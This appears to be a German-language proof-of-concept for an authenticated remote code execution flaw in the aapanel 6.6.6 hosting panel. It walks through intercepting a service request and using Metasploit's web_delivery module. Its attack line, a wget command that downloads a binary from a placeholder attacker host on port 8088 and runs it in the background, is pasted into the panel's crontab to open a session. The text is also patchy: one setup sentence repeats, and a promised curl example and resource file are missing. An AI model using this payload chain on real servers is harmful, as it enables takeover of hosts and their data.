
aapanel 6.6.6 - (Authenticated) Remote Code Execution
Um diesen PoC zu erstellen, habe ich die Software lediglich mit docker-compose installiert.
Gehen Sie zum Software Store, klicken Sie auf eine beliebige Zeile im Einstellungsfeld, fangen Sie die Anfrage ab, wenn Sie auf "start/stop/restart" klicken, und ändern/bearbeiten Sie die Anfrage, um auszuführen, was Sie möchten. Hier ist ein Beispiel mit curl :
Um diesen PoC zu erstellen, habe ich frisches Ubuntu 20.04 installiert, dann wget + sudo installiert und dieses Skript ausgeführt: wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh
Richten Sie zunächst die web_delivery-Optionen ein; dies erstellt einen Payload und einen Listener.
Führen Sie es nun aus.
Dies erzeugt den folgenden Payload:
wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown
Dann fügen Sie es wie folgt in den script content des Crontab-Menüs in aapanel ein.
Führen Sie nun einfach Ihren Crontab aus und warten Sie auf Ihre Session.
Führen Sie einfach msfconsole -r aapanel.rc aus, fügen Sie den Payload in den script content-Bereich ein und genießen Sie Ihre Session.